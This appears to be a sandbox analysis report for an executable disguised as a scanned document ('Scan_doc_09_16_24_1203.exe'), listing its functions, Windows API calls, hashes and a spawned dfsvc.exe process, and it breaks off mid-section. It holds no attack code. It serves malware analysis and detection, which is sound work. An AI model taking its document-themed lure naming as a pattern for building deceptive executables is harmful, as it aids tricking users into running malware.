Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 2597970681-0
Opcode ID: d42186fe7a62222efdfa99cb333f83a617f2923ca3325b5f5d6d98f973ef80f2
Instruction ID: 26404baf18715a71119fd1953e39f7bc31d43c0d08af0540517cf0ee1c748ec8
Opcode Fuzzy Hash: d42186fe7a62222efdfa99cb333f83a617f2923ca3325b5f5d6d98f973ef80f2
Instruction Fuzzy Hash: 7451197261064AABDB2C8F66CC85EAF3FAEFB48750B254628FC49D6140EB30DC40D650

Function 005E8417 Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,005E8B8C,?,00000000,?,00000000,00000000), ref: 005E8459
__fassign.LIBCMT ref: 005E84D4
__fassign.LIBCMT ref: 005E84EF
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 005E8515
WriteFile.KERNEL32(?,?,00000000,005E8B8C,00000000,?,?,?,?,?,?,?,?,?,005E8B8C,?), ref: 005E8534
WriteFile.KERNEL32(?,?,00000001,005E8B8C,00000000,?,?,?,?,?,?,?,?,?,005E8B8C,?), ref: 005E856D

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: b146f2e8ca8786b9a3d63ba87d01f7f07932e256deb3fca78fce44aef2992884
Instruction ID: d78b474f0c7cac2c17da80c604a5cfaefd16875a393db08e7f4518cb9e9a83b7
Opcode Fuzzy Hash: b146f2e8ca8786b9a3d63ba87d01f7f07932e256deb3fca78fce44aef2992884
Instruction Fuzzy Hash: 9F51D370900289AFDB14CFA9D885AFEBFF9FF19300F14455AE595E7291DB309940CB60

Function 005E1E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 005E1E37
___except_validate_context_record.LIBVCRUNTIME ref: 005E1E3F
_ValidateLocalCookies.LIBCMT ref: 005E1EC8
__IsNonwritableInCurrentImage.LIBCMT ref: 005E1EF3
_ValidateLocalCookies.LIBCMT ref: 005E1F48

Strings

csm, xrefs: 005E1EDD

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 550df27e87bbe3dd7ed9cdd9c0409d937d4c91b574660e3718d8bacd12153604
Instruction ID: 8c6c9ab05400b67a143a78eadd9a558456f1047350454baa8e33c56abd0e79cf
Opcode Fuzzy Hash: 550df27e87bbe3dd7ed9cdd9c0409d937d4c91b574660e3718d8bacd12153604
Instruction Fuzzy Hash: D141E334A006899BCF18DF2AC884AAEBFB9BF44364F148455FC559B392D731AD05CF94

Function 005E621B Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005E61DF: _free.LIBCMT ref: 005E6208

_free.LIBCMT ref: 005E6269

Part of subcall function 005E4869: HeapFree.KERNEL32(00000000,00000000,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?), ref: 005E487F
Part of subcall function 005E4869: GetLastError.KERNEL32(?,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?,?), ref: 005E4891

_free.LIBCMT ref: 005E6274
_free.LIBCMT ref: 005E627F
_free.LIBCMT ref: 005E62D3
_free.LIBCMT ref: 005E62DE
_free.LIBCMT ref: 005E62E9
_free.LIBCMT ref: 005E62F4

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction ID: 9692c4cff4185e485139860230804b99fe86990455311d28468eb4f7bc03eb15
Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction Fuzzy Hash: FB1184B1540BD5AAD629B772CC0FFCB7F9C7F807C1F404824B6DA66093DA65BA04CA51

Function 005E23D1 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,005E23C8,005E209F,005E1AFC), ref: 005E23DF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005E23ED
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005E2406
SetLastError.KERNEL32(00000000,005E23C8,005E209F,005E1AFC), ref: 005E2458

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0452b368725fe6856df719d3545b055bb0e9074e422e2bc94c972ccf21d3bbff
Instruction ID: 4b0255c0802b4bcccb2a15d373cc4f4a32f9e0887daec55615c8ec2ea42e7856
Opcode Fuzzy Hash: 0452b368725fe6856df719d3545b055bb0e9074e422e2bc94c972ccf21d3bbff
Instruction Fuzzy Hash: F901B5725087E69FAA1C27776C8D5272F5CFB517B5F200339F5A0850ECEF564C45A148

Function 005E4424 Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00000008,?,005E6D69,?,?,?,005F04C8,0000002C,005E3F34,00000016,005E209F,005E1AFC), ref: 005E4428
_free.LIBCMT ref: 005E445B
_free.LIBCMT ref: 005E4483
SetLastError.KERNEL32(00000000), ref: 005E4490
SetLastError.KERNEL32(00000000), ref: 005E449C
_abort.LIBCMT ref: 005E44A2

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 6a003d5daafedad18e8d471a5cb30da4d3ad17de8b4b7660ab8de87094895e20
Instruction ID: 8a20239b2bebb6fe693f87a2ccdcf98501db058fc7f40533501278f1b8e96d6d
Opcode Fuzzy Hash: 6a003d5daafedad18e8d471a5cb30da4d3ad17de8b4b7660ab8de87094895e20
Instruction Fuzzy Hash: D7F0F432604AC2A7DB1E7737AC4DB2B2E2ABBD1771F204414F6E8D61D1FF2589019925

Function 005E36FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005E36AD,?,?,005E364D,?,005F02E0,0000000C,005E37A4,?,00000002), ref: 005E371C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005E372F
FreeLibrary.KERNEL32(00000000,?,?,?,005E36AD,?,?,005E364D,?,005F02E0,0000000C,005E37A4,?,00000002,00000000), ref: 005E3752

Strings

mscoree.dll, xrefs: 005E3715
CorExitProcess, xrefs: 005E3727

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 399fc854321fb60894e560b418d9eb33626db811133a7594be2c8a4a5e427763
Instruction ID: ada6f6979ccd3aa87764e6eda288d88b04568007b2e0cbffbe353eb09a271e90
Opcode Fuzzy Hash: 399fc854321fb60894e560b418d9eb33626db811133a7594be2c8a4a5e427763
Instruction Fuzzy Hash: 74F04470A00288BBDB199F91DC4DBAFBFF4FF14752F004064F945A6160DB315E44DA94

Function 005E634D Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,005E54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 005E639A
__alloca_probe_16.LIBCMT ref: 005E63D2
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005E6423
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 005E6435
__freea.LIBCMT ref: 005E643E

Part of subcall function 005E62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,005E7E5B,?,00000000,?,005E686F,?,00000004,00000000,?,?,?,005E3BCD), ref: 005E6331

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 1857427562-0
Opcode ID: a62ed9f5616cd8af5362555f59f1c75e5a6e41261c6f8dc516ee685a440a62ed
Instruction ID: 9dd86779e610c496890f985a62c672249bdf0777d223b47685c425571d0ef7f3
Opcode Fuzzy Hash: a62ed9f5616cd8af5362555f59f1c75e5a6e41261c6f8dc516ee685a440a62ed
Instruction Fuzzy Hash: BB31DF32A0029AABDF289F66DC89DAE7FA5FB60390F044128FC54D7190E735DD54CBA0

Function 005E561E Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 005E5627
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005E564A

Part of subcall function 005E62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,005E7E5B,?,00000000,?,005E686F,?,00000004,00000000,?,?,?,005E3BCD), ref: 005E6331

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005E5670
_free.LIBCMT ref: 005E5683
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005E5692

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
String ID:
API String ID: 2278895681-0
Opcode ID: b4a18741e2a75db547d761098f98635c4677d468ea74acd5050e46162899ccdf
Instruction ID: 717e5393e4a71e552df72428d9c5744f95eed3c65f3cb277db689bf39129d431
Opcode Fuzzy Hash: b4a18741e2a75db547d761098f98635c4677d468ea74acd5050e46162899ccdf
Instruction Fuzzy Hash: 3601F272602AD67F27291ABB5C8CC7B6E6DFEC2BA93560169F984C7100FF608D0195B0

Function 005E44A8 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,005E47FE,005E7E79,?,005E686F,?,00000004,00000000,?,?,?,005E3BCD,?,00000000), ref: 005E44AD
_free.LIBCMT ref: 005E44E2
_free.LIBCMT ref: 005E4509
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 005E4516
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 005E451F

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 9206133b47459e4d8725844b1d29b34388cf175f7e9c878bd6f958d4ee947d7a
Instruction ID: d7f2db758cd56d138c102aa7b5feb6693054c0dedf5514ed17196017b0278093
Opcode Fuzzy Hash: 9206133b47459e4d8725844b1d29b34388cf175f7e9c878bd6f958d4ee947d7a
Instruction Fuzzy Hash: C1012636200AC2A7961E7A332C8DE3B1E2EBBD0372B200025F5D9D62C2FF208D049824

Function 005E6176 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 005E618E

Part of subcall function 005E4869: HeapFree.KERNEL32(00000000,00000000,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?), ref: 005E487F
Part of subcall function 005E4869: GetLastError.KERNEL32(?,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?,?), ref: 005E4891

_free.LIBCMT ref: 005E61A0
_free.LIBCMT ref: 005E61B2
_free.LIBCMT ref: 005E61C4
_free.LIBCMT ref: 005E61D6

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 92e29a2f430fa8e31e37c868d612303685329ff06a7377538fa66b35eb27c366
Instruction ID: e4fcd410f4aef2becb7f2635201b96f7aa6396801087c800dff88568db32f1fc
Opcode Fuzzy Hash: 92e29a2f430fa8e31e37c868d612303685329ff06a7377538fa66b35eb27c366
Instruction Fuzzy Hash: 65F0AF32608680AFC66DEB17F885C2A3FDDBAA0BD07580804F08AC7842C724FC80CA54

Function 005E3D8F Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005E3DAD

Part of subcall function 005E4869: HeapFree.KERNEL32(00000000,00000000,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?), ref: 005E487F
Part of subcall function 005E4869: GetLastError.KERNEL32(?,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?,?), ref: 005E4891

_free.LIBCMT ref: 005E3DBF
_free.LIBCMT ref: 005E3DD2
_free.LIBCMT ref: 005E3DE3
_free.LIBCMT ref: 005E3DF4

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 43c1b76c1936bac34c5c92f7f5c1ea179b045c1db88a44d6759616180d8275cd
Instruction ID: 2fe1a68f837d669bf7db356bbf6ce141e04e09afe9fd860152cb8c37f240b54c
Opcode Fuzzy Hash: 43c1b76c1936bac34c5c92f7f5c1ea179b045c1db88a44d6759616180d8275cd
Instruction Fuzzy Hash: 19F03AB8804AA1CFC749AF17FD058293F71BBA57607400256F542DA2B1C7390959EFCA

Function 005E2F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe,00000104), ref: 005E2F93
_free.LIBCMT ref: 005E305E
_free.LIBCMT ref: 005E3068

Strings

C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe, xrefs: 005E2F8A, 005E2F91, 005E2FC0, 005E2FF8

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe
API String ID: 2506810119-3454431308
Opcode ID: a5632897cca838852657c014edff544f6fa542f839c90bb8f623417bf8143176
Instruction ID: 3fdc4f359b1f8cda0ba824dabe55c852d489ec31a9d96d0c87c6bb5a6e7f863a
Opcode Fuzzy Hash: a5632897cca838852657c014edff544f6fa542f839c90bb8f623417bf8143176
Instruction Fuzzy Hash: 8D31AC71A00298EFCB29DB9BDC899AEBFFCFB85710F104066E484DB210D6718E45DB91

Function 005E25E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,005E2594,00000000,?,005F1B50,?,?,?,005E2737,00000004,InitializeCriticalSectionEx,005EBC48,InitializeCriticalSectionEx), ref: 005E25F0
GetLastError.KERNEL32(?,005E2594,00000000,?,005F1B50,?,?,?,005E2737,00000004,InitializeCriticalSectionEx,005EBC48,InitializeCriticalSectionEx,00000000,?,005E24C7), ref: 005E25FA
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 005E2622

Strings

api-ms-, xrefs: 005E2607

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 7c53cb9331dc81585b27b2371b2bf387e72033582941ee6fc960c04b08fd554d
Instruction ID: 9fd92891d46c8add5c1568e0f4d7e432ac1afadf4b15dd5ef45906899b558dc4
Opcode Fuzzy Hash: 7c53cb9331dc81585b27b2371b2bf387e72033582941ee6fc960c04b08fd554d
Instruction Fuzzy Hash: 27E01272640284BBEF152B62EC4EB5B3F58BB10B52F104420F99DA80A5EBA1A9549944

Function 005E57DD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,005E5784,00000000,00000000,00000000,00000000,?,005E5981,00000006,FlsSetValue), ref: 005E580F
GetLastError.KERNEL32(?,005E5784,00000000,00000000,00000000,00000000,?,005E5981,00000006,FlsSetValue,005EC4D8,FlsSetValue,00000000,00000364,?,005E44F6), ref: 005E581B
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,005E5784,00000000,00000000,00000000,00000000,?,005E5981,00000006,FlsSetValue,005EC4D8,FlsSetValue,00000000), ref: 005E5829

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 89237d89d633e48c3701e8c3804edeffbcbe9ff055a8c67cc812efdfb87405f7
Instruction ID: f39e584f8f0bcb3f3f6f32c9f1cfc7d21ebf7bf8e2a81f601ed896306ccf52c7
Opcode Fuzzy Hash: 89237d89d633e48c3701e8c3804edeffbcbe9ff055a8c67cc812efdfb87405f7
Instruction Fuzzy Hash: 7F01AC3260A6B2EBD7294A6AAC88A577F58BF157A5B300524FAE6D7140E720D805C6E0

Function 005E4EBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,?,?,005E5147,?), ref: 005E4EE9
GetACP.KERNEL32(00000000,?,?,005E5147,?), ref: 005E4F00

Strings

GQ^, xrefs: 005E4ED7

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID:
String ID: GQ^
API String ID: 0-2783400625
Opcode ID: 7efab400008320f45c5172a5a8b49b7948fecbc7bfd81930d2f87e2cffaf52dc
Instruction ID: 26f5e4821e09a53ff0763319a6070715755cc5e32bc508b3a119dc828ad634e9
Opcode Fuzzy Hash: 7efab400008320f45c5172a5a8b49b7948fecbc7bfd81930d2f87e2cffaf52dc
Instruction Fuzzy Hash: 61F08C30800684DBDB288B69DC487B97BB4BB50729F100344E4B4CE6E1C7766848DF51

Analysis Process: dfsvc.exePID: 6176, Parent PID: 7140COMMON

Execution Graph

Execution Coverage:	16.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B8A1608 Relevance: 1.8, APIs: 1, Instructions: 280
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00007FFD9B8A1827

Memory Dump Source

Source File: 00000001.00000002.2642164148.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8a0000_dfsvc.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0b73b83df6d107e1207b55d86031f35a637a32055594344e0aef78b289b03b3b
Instruction ID: 5d5de36463bf5c9c76d403fcc4a59ec183896450e285a7448cee168e1a7e94db
Opcode Fuzzy Hash: 0b73b83df6d107e1207b55d86031f35a637a32055594344e0aef78b289b03b3b
Instruction Fuzzy Hash: A2811B31B0EA8D4FD755EBBC88696B87BD1EF5A210B0841BFD059C71E2DE24A406C351

Function 00007FFD9B8AECE2 Relevance: 1.8, APIs: 1, Instructions: 278
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

